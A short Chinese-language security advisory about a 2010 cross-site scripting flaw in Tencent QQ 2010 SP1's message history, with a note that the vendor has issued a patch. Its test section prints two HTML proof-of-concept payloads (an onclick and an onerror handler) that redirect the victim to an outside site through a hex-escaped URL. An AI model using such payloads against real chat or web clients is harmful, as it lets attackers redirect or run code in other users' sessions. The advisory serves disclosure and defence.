发布日期：2010-07-28
更新日期：2010-07-28

受影响系统：

Tencent QQ 2010 SP1

描述：

---

腾讯QQ是在中国非常广泛使用的即时聊天工具。

QQ的消息记录没有对会话消息中的Javascript和Html标签进行转义，远程攻击者可能通过发送恶意聊天消息导致注入并执行恶意代码。

<*来源：TGL
  
  链接：http://m.cnbeta.com/article-117703.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />    
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>

建议：

---

厂商补丁：

Tencent
-------
目前厂商已经在最新版本的软件中修复了这个安全问题，请到厂商的主页下载：

http://im.qq.com/qq/dlqq.shtml

浏览次数：3380
严重程度：0（网友投票）